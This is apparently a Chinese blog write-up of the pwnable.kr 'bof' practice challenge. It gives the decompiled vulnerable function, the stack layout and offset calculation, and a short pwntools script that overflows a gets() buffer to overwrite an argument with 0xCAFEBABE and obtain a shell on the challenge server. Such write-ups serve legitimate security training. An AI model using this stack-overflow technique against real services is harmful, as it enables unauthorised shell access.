Running at : nc pwnable.kr 9000

IDA查看

 1 unsigned int __cdecl func(int a1)

 2 {

 3   char s; // [esp+1Ch] [ebp-2Ch]

 4   unsigned int v3; // [esp+3Ch] [ebp-Ch]

 5

 6   v3 = __readgsdword(0x14u);

 7   puts("overflow me : ");

 8   gets(&s);//未对输入长度进行限制,存在栈溢出

 9   if ( a1 == 0xCAFEBABE )

10     system("/bin/sh");

11   else

12     puts("Nah..");

13   return __readgsdword(0x14u) ^ v3;

14 }

查看栈,

 1 -0000002C s               db ?

 2 -0000002B                 db ? ; undefined

 3 -0000002A                 db ? ; undefined

 4 -00000029                 db ? ; undefined

 5 -00000028                 db ? ; undefined

 6 -00000027                 db ? ; undefined

 7 -00000026                 db ? ; undefined

 8 -00000025                 db ? ; undefined

 9 -00000024                 db ? ; undefined

10 -00000023                 db ? ; undefined

11 -00000022                 db ? ; undefined

12 -00000021                 db ? ; undefined

13 -00000020                 db ? ; undefined

14 -0000001F                 db ? ; undefined

15 -0000001E                 db ? ; undefined

16 -0000001D                 db ? ; undefined

17 -0000001C                 db ? ; undefined

18 -0000001B                 db ? ; undefined

19 -0000001A                 db ? ; undefined

20 -00000019                 db ? ; undefined

21 -00000018                 db ? ; undefined

22 -00000017                 db ? ; undefined

23 -00000016                 db ? ; undefined

24 -00000015                 db ? ; undefined

25 -00000014                 db ? ; undefined

26 -00000013                 db ? ; undefined

27 -00000012                 db ? ; undefined

28 -00000011                 db ? ; undefined

29 -00000010                 db ? ; undefined

30 -0000000F                 db ? ; undefined

31 -0000000E                 db ? ; undefined

32 -0000000D                 db ? ; undefined

33 -0000000C var_C           dd ?

34 -00000008                 db ? ; undefined

35 -00000007                 db ? ; undefined

36 -00000006                 db ? ; undefined

37 -00000005                 db ? ; undefined

38 -00000004                 db ? ; undefined

39 -00000003                 db ? ; undefined

40 -00000002                 db ? ; undefined

41 -00000001                 db ? ; undefined

42 +00000000  s              db 4 dup(?)

43 +00000004  r              db 4 dup(?)

44 +00000008 arg_0           dd ?

45 +0000000C

46 +0000000C ; end of stack variables

0x2c+8 =0x34=52,来到arg_0的存储空间

exp:

 1 from pwn import *

 2

 3 r = remote('pwnable.kr','9000')

 4

 5 buf = 52 * 'A'

 6 buf += p32(0xcafebabe)

 7

 8 r.sendline(buf)

 9

10 r.interactive()

pwnable.kr第三题bof的更多相关文章

  1. 【pwnable.kr】fb

    这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇. ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c, ...

  2. 【pwnable.kr】blackjack

    又一道pwnable nc pwnable.kr 9009 读题找到源代码在:http://cboard.cprogramming.com/c-programming/114023-simple-bl ...

  3. pwnable.kr之brainf*ck

    pwnable.kr之brainf*ck 今天又是被难倒的一天Orz,个人感觉pwnable.kr上的题都比较剑走偏锋,仔细做过去,一定会有很大的收获. 不多说了,今天看的是第二关的第一道题:brai ...

  4. 【pwnable.kr】bof

    pwnable从入门到放弃,第三题. Download : http://pwnable.kr/bin/bofDownload : http://pwnable.kr/bin/bof.c Runnin ...

  5. pwnable.kr bof之write up

    这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...

  6. pwnable.kr之bof

    打开题目: 先下载题目给我们的两个文件,查看文件信息: 发现没有执行的权限,所以先增加文件bof的执行权限,执行: 没发现啥,然后查看代码, #include <stdio.h> #inc ...

  7. pwnable.kr 第一题fd

    使用ssh fd@pwnable.kr -p2222连接输入密码guest 1 fd@prowl:~$ ls -al 2 total 40 3 drwxr-x--- 5 root fd 4096 Oc ...

  8. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  9. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

随机推荐

  1. MongoDB Manually config

    MongoDB Manually config macOS 10.15.x path error exception in initAndListen: NonExistentPath: Data d ...

  2. HTML marquee

    HTML marquee 跑马灯 https://developer.mozilla.org/en-US/docs/Web/HTML/Element/marquee https://developer ...

  3. fetch & form-data & upload & image file

    fetch & form-data & upload & image file no need multipart/form-data https://blog.xinshan ...

  4. .NET Core Swagger 的分组使, 以及相同Action能被多个分组公用,同时加载出尚未分组的数据出来

    1.本文章参考 点击链接跳转 改写的 一对多分组模式.需要一对一的可以参考 2.本文主要讲的是 一对多 分组公用, 同时把尚未分组的加载出来 3.效果演示GIF图: 具体操作代码如下: 1.在项目创建 ...

  5. fail模块场景(ansible)

    更多见博客 : https://blog.csdn.net/qq_35887546/article/details/105242720 创建剧本 /home/alice/ansible/lvm.yml ...

  6. elasticsearch如何设计集群

    本文为博客园作者所写: 一寸HUI,个人博客地址:https://www.cnblogs.com/zsql/ 在写本文时就在想,如果让你负责一个elasticsearch集群,从零开始,你会从哪些方面 ...

  7. if __name__ == '__main__':简单粗暴解释

    这个脚本被执行的时候,__name__ 值就是 __main__ ,才会执行 main()函数如果这个脚本是被 import 的话,__name__的值不一样.main()函数就不会被调用.这个句子用 ...

  8. Hexo的详细搭建过程——小白的血泪经历QAQ

    Hexo的详细搭建过程 环境要求: node.js git 这里提供Centos8.2下的安装过程: dnf module list nodejs dnf module install nodejs: ...

  9. 【Azure Redis 缓存】Azure Redis 功能性讨论二

    继承上一次讨论了Azure Redis的可用性,可靠性,稳定性,安全性,监控方面的九大功能点.详情可回顾文章:[Azure Redis 缓存]Azure Redis功能性讨论 这次我们继续讨论Azur ...

  10. Java实现文件的读写

    需求:实现基本的读写 package com.sbx.io; import java.io.File; import java.io.FileReader; import java.io.FileWr ...